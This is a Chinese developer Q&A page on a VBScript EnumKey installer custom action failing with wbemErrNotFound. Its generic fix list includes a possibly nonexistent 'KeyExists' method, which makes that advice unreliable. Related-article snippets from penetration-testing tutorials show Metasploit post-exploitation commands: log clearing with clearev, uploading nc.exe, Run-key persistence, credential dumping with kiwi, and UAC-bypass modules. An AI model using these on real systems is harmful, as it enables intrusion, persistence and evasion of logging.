首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

在vbscript中调用EnumKey作为安装程序中的自定义操作查询windows注册表将导致wbemErrNotFound

在vbscript中调用EnumKey作为安装程序中的自定义操作查询Windows注册表将导致wbemErrNotFound错误。

在vbscript中,EnumKey是用于枚举指定注册表项下的子项的方法。当我们尝试在安装程序中使用EnumKey来查询Windows注册表时,可能会遇到wbemErrNotFound错误。这个错误表示指定的注册表项不存在。

要解决这个问题,我们可以采取以下步骤:

  1. 确保注册表路径正确:检查在调用EnumKey时指定的注册表路径是否正确。确保路径中的每个部分都正确拼写,并且使用正确的反斜杠(\)作为路径分隔符。
  2. 确保注册表项存在:在调用EnumKey之前,可以使用Registry对象的KeyExists方法来检查指定的注册表项是否存在。如果KeyExists返回False,则表示注册表项不存在,可能会导致wbemErrNotFound错误。
  3. 确保有足够的权限:某些注册表项可能需要管理员权限才能访问。确保以管理员身份运行脚本或程序,以确保具有足够的权限来访问注册表项。
  4. 错误处理:在调用EnumKey时,可以使用错误处理机制来捕获并处理wbemErrNotFound错误。可以使用Err对象来获取错误信息,并根据需要采取相应的措施,例如输出错误信息或执行备用操作。

总结: 在vbscript中调用EnumKey作为安装程序中的自定义操作查询Windows注册表时,可能会遇到wbemErrNotFound错误。为了解决这个问题,我们需要确保注册表路径正确、注册表项存在、有足够的权限,并进行适当的错误处理。

腾讯云相关产品和产品介绍链接地址: 腾讯云提供了一系列云计算相关的产品和服务,包括云服务器、云数据库、云存储等。您可以访问腾讯云官方网站(https://cloud.tencent.com/)了解更多关于腾讯云的产品和服务信息。

页面内容是否对你有帮助?
有帮助
没帮助

相关·内容

【脚本】pythonwmi介绍和使用

Windows NT 4.0 Service Pack 4 一起发行,是内置Windows 2000、 Windows XP和Windows Server 2003 系列操作系统核心管理支持技术。...如图一:(1.gif) WMI 体系结构我们最需要关心就是WMI提供程序,WMI提供程序WMI和托管资源之间扮演着中间方角色。...5.Windows 安装程序提供程序 链接库文件:msiprov.dll 命名空间:root\cimv2 作用:提供对已安装软件信息访问。...从 上面可以看出在WMI类(即内置提供程序)被分组到命名空间中,命名空间可以看成是一个组。比如,命名空间 root\cimv2 包括大部分表示通常与计算机和操作系统相关联资源类。...使用类时候要说明类所在命名空间。类由属性和方法构成。这是可视化编程两个重要概 念。属性描述是对象状态,方法是对象可以执行操作

2.1K20

一.获取Windows主机信息、注册表、U盘历史痕迹和回收站文件

WMI作为一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以远程计算机器上启动一个进程;设定一个特定日期和时间运行进程;远程启动计算机;获得本地或远程计算机安装程序列表...本文使用Python获取Windows系统上相关信息可以使用WMI接口,安装调用PIP工具即可。...C#注册表进行操作,需要引用命名空间using Microsoft.Win32。 RegistryKey类:表示注册表顶级结点,此类是注册表封装。...\Software这个键下创建程序产品键,保存一些程序配置注册表。...使用FAT文件系统Windows98系统,回收站目录通常是C:\Recycled;Windows NT2000、Windows XP在内支持NTFS操作系统,C:\Recycler;Windows

2.4K20

三十二.Python攻防之获取Windows主机信息、注册表、U盘痕迹和回收站(1)

WMI作为一种规范和基础结构,通过它可以访问、配置、管理和监视几乎所有的Windows资源,比如用户可以远程计算机器上启动一个进程;设定一个特定日期和时间运行进程;远程启动计算机;获得本地或远程计算机安装程序列表...本文使用Python获取Windows系统上相关信息可以使用WMI接口,安装调用PIP工具即可。...C#注册表进行操作,需要引用命名空间using Microsoft.Win32。 RegistryKey类:表示注册表顶级结点,此类是注册表封装。...\Software这个键下创建程序产品键,保存一些程序配置注册表。...使用FAT文件系统Windows98系统,回收站目录通常是C:\Recycled;Windows NT2000、Windows XP在内支持NTFS操作系统,C:\Recycler;Windows

1.3K10

Metasploit从入门到入坟

这里migrate 1264成功将我们shell攻击文件移植到了explorerPID,这是攻击常用注入进程程序之一,主要作用是以后对方就算关机重启后,开启监听还是能继续获得反弹shell!!...6) 清除日志 后渗透后需要将日志痕迹清理: clearev #清除windows应用程序日志、系统日志、安全日志,需要管理员权限 执行命令前存在很多日志痕迹: ? 执行后: ? ?...#获取安装软件信息 run post/windows/gather/dumplinks #获取最近文件操作 run post/windows/gather/enum_ie...所以如果目标系统是64位,则必须先查看系统进程列表,然后meterpreter进程迁移到一个64位程序进程,才能加载kiwi并且查看系统明文。如果目标系统是32位,则没有这个限制。 ?...,建议思路是: C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本 注册表HKLM\Software\Microsoft\Windows\CurrentVersion

92430

1.1 Metasploit 工具简介

其中一个强大功能是生成后门,它可以让攻击者目标系统中保持持久访问权限。本章,我们探讨如何使用Metasploit生成各类后门,并了解它是如何工作。...内存代码强制转换为函数指针,并调用该函数。...这些模块包括获取操作系统版本、已安装软件、已运行进程、网络配置等信息。...环境下时,这些功能可以被直接调用,我们已枚举目标服务为例,通过info命令读者可查询特定模块定义规范,而run则是运行这段枚举程序;meterpreter > info post/windows/gather...-d 注册表中值数据-k 注册表键路径-v 注册表键名称enumkey 枚举可获得键setval 设置键值queryval 查询键值数据# 上传nc工具到根目录meterpreter >

48710

1.1 Metasploit 工具简介

其中一个强大功能是生成后门,它可以让攻击者目标系统中保持持久访问权限。本章,我们探讨如何使用Metasploit生成各类后门,并了解它是如何工作。...内存代码强制转换为函数指针,并调用该函数。...这些模块包括获取操作系统版本、已安装软件、已运行进程、网络配置等信息。...环境下时,这些功能可以被直接调用,我们已枚举目标服务为例,通过info命令读者可查询特定模块定义规范,而run则是运行这段枚举程序; meterpreter > info post/windows/gather...-d 注册表中值数据 -k 注册表键路径 -v 注册表键名称 enumkey 枚举可获得键 setval 设置键值 queryval 查询键值数据 # 上传nc工具到根目录 meterpreter

34820

WMI 攻击手法研究 – 与 windows 注册表交互 (第三部分)

文章目录[隐藏] 1 Windows 注册表是什么 2 注册表 & WMI 2.1 查询注册表 2.2 修改注册表 3 工具 4 结论 这是 WMI 攻击手法研究系列第三篇,本文重点介绍与 Windows...1 Windows 注册表是什么 简单来说,注册表是一个存储操作系统配置设置数据库:内核、设备驱动程序、服务、SAM、用户界面和第三方应用程序都使用注册表,这使得注册表成为攻击者非常关注一个点。...创建注册表项 现在我们知道对 HKEY_CURRENT_USER 下运行注册表项有写访问权限,将计算器应用程序添加到注册表。...:Powersploit 是一个非常有用脚本,它通过使用 WMI 作为纯 C2 通道 Payload 存储注册表来帮助执行代码; Invoke-SessionGopher.ps1:从 PoweShell...4 结论 收集有用数据时,注册表是攻击者宝库。此外,注册表还可用于存储 Payload,作为理想无文件攻击和持久性机制。

1.1K20

1.1 Metasploit 工具简介

其中一个强大功能是生成后门,它可以让攻击者目标系统中保持持久访问权限。本章,我们探讨如何使用Metasploit生成各类后门,并了解它是如何工作。...内存代码强制转换为函数指针,并调用该函数。...这些模块包括获取操作系统版本、已安装软件、已运行进程、网络配置等信息。...环境下时,这些功能可以被直接调用,我们已枚举目标服务为例,通过info命令读者可查询特定模块定义规范,而run则是运行这段枚举程序;meterpreter > info post/windows/gather...-d 注册表中值数据-k 注册表键路径-v 注册表键名称enumkey 枚举可获得键setval 设置键值queryval 查询键值数据# 上传nc工具到根目录meterpreter >

41730

VBScript详解(一)

COM对象就是一些具有特定函数功能项程序模块,他们一般以ocx或者dll作为扩展名,你只要找到包含有你需要功能模块文件,并在脚本规范引用,就可以实现特定功能,也就是说Vbs脚本就是调用现成...2、VBScript,变量命名规则遵循标准命名规则,需要注意是:VBScript对变量、方法、函数和对象引用是不区分大小写。...4、VBScript定义时只有一种变量类型,实际使用需要使用类型转换函数来变量转换成相应变量类型。 Cbool函数变量转换成布尔值; Cbyte函数变量转换为0到255之间整数。...——CreateObject,这条命令可以访问windows系统内安装所有com对象,并且可以调用这些部件存放命令。...Vbs修改注册表语句主要有: 1、读注册表关键词和值: 可以通过把关键词完整路径传递给wshshell(WshShell对象,提供对本地 Windows外壳程序访问)对象regread方法

3.1K20

后门权限维持学习笔记1

服务,即使远程主机再次启动,该脚本依然可以让主机重新连接远程攻击端口,由于meterpreter不需要身份验证,这也导致任何发现端口黑客也可利用此渠道进入后门,真实情况下,建议完成任务后尽快自行清理...通过提示判断,该组件主要是c盘temp下建立一个vbs文件,注册表设置,开机启动该vbs脚本。重启主机并验证是否重连,发现开启监听端口后,主机重新连接了端口,产生了session: ?...1.3 注意事项 每次使用该模块,msf会自动生成一个rc文件,执行该文件命令,可删除目标机器vbs脚本,防止对目标系统造成一些后续影响,建议渗透测试结束后执行该操作。 ? ?...reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run ?...Metsvc注模 metsvc,是一个Merterpreter集成脚本,与反弹shell不同,他是目标机器上,本地监听一个端口,默认是31337端口,执行文件放到指定目录下,并且将自己安装成一个系统服务

67610

上线Metasploit后该干啥?

5.查看最近打开文件 run post/windows/gather/dumplinks 6.查看关于火狐浏览器登陆web appliaction 账号密码 假设目标系统安装了火狐浏览器,并将账号密码设置为保存在浏览器...1.上传nc.exe到目标主机 upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32 //传送到了系统目录下 2.查看注册表默认跟随主机启动内容...reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run //reg 是merterpreter中专门查看修改注册表命令...其他注册表选项[2] 磁盘加密 Bitlocker 磁盘加密,有的电脑加密文件是被加密封存,Bitlocker加密就是一种,集成 windows系统软件系统。...persistence 查看一下参数配置项 -A 默认连接方式为exploit/multi/handler -S 作为一个系统服务进程工作系统上 -X 自动执行当系统开机 -i 延迟时间,当服务运行后隔

36910

Python3使用winreg模块操作注册表

Windows系统注册表本质上就是一个数据库,其中存放着硬件、软件、用户、操作系统以及程序相关设置信息。...我们除了使用regedit,也可以通过编程读取并操作系统注册表,以下以Python3为例。...一、访问注册表 具体代码如下,可访问用户账户列表: 该设置位于HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList...subDir_2 = r'%s\%s' % (subDir, subKeyName) # 4.根据获取键名拼接之前路径作为参数,获取当前键下所属键控制 keyHandle_2 =...CloseKey(keyHandle) CloseKey(regRoot) 执行结果如下,我们可以通过读取含有Users字段数据,从而间接获取用户账户信息: 二、修改注册表数据 以下以修改注册表防火墙公网和家用网络开启和关闭为例

82410

使用WiX制作具有时间限制安装

WiX是Windows Installer XML简称,它是用于制作Windows安装工具集。它支持命令行环境,开发者可以及将它集成到他们编译过程创建MSI和MSM安装包。...选择合适脚本语言(VBScript or JScript)实现定制操作。 2. 选择合适实际执行上面的脚本。 下面分享我实现过程: 1....实现一段检查当前时间是否越界脚本代码,并将它封装到CustomAction。     使用VBScript比较当前日期和限定日期,小于0表示越界,这时调用WScript想注册表添加坏键。...选择合适时机执行上述脚本,越早越好。     本文demo,我PrepareDlg之前执行脚本,对于大多数情况而言,这已经是最早时机了。...FatalError对话框中发布Finish事件,同时值设置给第五步提到清除操作

1.4K60

ATT&CK框架:攻击者最常用TOP7攻击技术及其检测策略

通过直接在API级别与操作系统交互,而无需调用其他程序,某些脚本语言可以用于绕过过程监视机制。...通过深入了解攻击者时如何使用本地进程或自定义工具,可以进一步了解攻击者行为。这就需要做到以下两方面:(1)了解组织机构应用程序常见来源;(2)收集命令行和相关检测数据. 4....“注册表run key/启动文件夹”是实现持久化关键动作 注册表“run keys”或启动文件夹添加一个条目,将会导致用户登录时,该程序会运行该条目。...针对该攻击技术,可以持久化机制生命周期三个不同点上有效地实现检测:安装时、休眠时以及触发时。 安装时检测run key和启动文件夹项目需要监视特定注册表和文件系统路径变更情况。...要检测已安装且处于休眠状态持久化,可以检查同一注册表和文件系统路径内容是否存在可疑条目。创建一个基准并定期监视是否有偏移基准情况,以此来减少调查工作量。

1.5K10

WMI ——重写版

Windows管理工具(WMI)是基于Windows操作系统管理数据和操作基础设施。...,这里不做过多介绍,用最多是 data queries ,请在实际查询中使用,需要明确是WQL仅能查询,无法使用 Methods 进行增删改等操作。...:消息记录到应用程序EventLog SMTPEventConsumer:每当事件被送达时,适用SMTP发送一封邮件 Filter to Consumer Binding ---- Filter to...WMI Attacks – Stealthy Command “Push” ---- 上面例子基本调用是 powershell或cmd,笔者其他篇中提到过ELK配合sysmon,查找这类攻击很容易...#生成恶意mof文件 #命令部分自定义,例如 regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll #目标Windows 机器上使用自带

2K10

windows提权看这一篇就够了

Windows fodhelper.exe应用程序调用自定义命令来绕过Windows 10 UAC。...它将生成关闭UAC标志第二个shell。此模块修改注册表项,但在调用payload后清除该项。该模块不需要payload体系架构和操作系统匹配。...exploit/windows/local/bypassuac_eventvwr#此模块通过在当前用户配置单元下劫持注册表特殊键并插入将在启动Windows事件查看器时调用自定义命令来绕过Windows...它将生成关闭UAC标志第二个shell。此模块修改注册表项,但在调用payload后清除该项。该模块不需要payload体系架构和操作系统匹配。...此模块修改注册表项,但在调用payload后清除该项,这个模块需要payload体系架构和操作系统匹配,但是当前低权限meterpreter会话体系架构可能不同。

3.2K20

windows提权看这一篇就够了

Windows fodhelper.exe应用程序调用自定义命令来绕过Windows 10 UAC。...它将生成关闭UAC标志第二个shell。此模块修改注册表项,但在调用payload后清除该项。该模块不需要payload体系架构和操作系统匹配。...exploit/windows/local/bypassuac_eventvwr#此模块通过在当前用户配置单元下劫持注册表特殊键并插入将在启动Windows事件查看器时调用自定义命令来绕过Windows...它将生成关闭UAC标志第二个shell。此模块修改注册表项,但在调用payload后清除该项。该模块不需要payload体系架构和操作系统匹配。...此模块修改注册表项,但在调用payload后清除该项,这个模块需要payload体系架构和操作系统匹配,但是当前低权限meterpreter会话体系架构可能不同。

15.4K31

IE浏览器主页被劫持,如何解决主页被篡改问题?

前几天号主电脑指纹解锁功能突然不能用了,号主以为是驱动没更新到最新版导致,去官网下载最新驱动都安装上了也是不行,后面找Dell客服两个小时也没有找到最终问题,后面个人怀疑是因为号主研究虚拟化技术导致一些冲突从而指纹识别不能用了...解决办法: Windows启动后,点击“开始”→“运行”菜单项,“打开”栏中键入regedit,然后按“确定”键;展开注册表到 HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft...解决办法: 运行注册表编辑器,然后展开上述子键,“Default_Page_UR”子键键值那些篡改网站网址改掉就好了,或者设置为IE默认值。...调用系统服务间隔30分钟执行一次,所有浏览器调用加上2345网址(总算把你揪出来了,藏得够深) 受到影响浏览器基本涵盖了市面上现有的所有浏览器(30余款),如下: "114ie.exe,115chrome.exe...,后面用exe解析程序直接查看IE程序,貌似瞥见了一丝2345影子,大概是修改了这里吧,也有大致可能修改了dll文件。最后我直接IE浏览器重新卸载功能再重新安装就解决了主页被劫持问题。

18.9K21
领券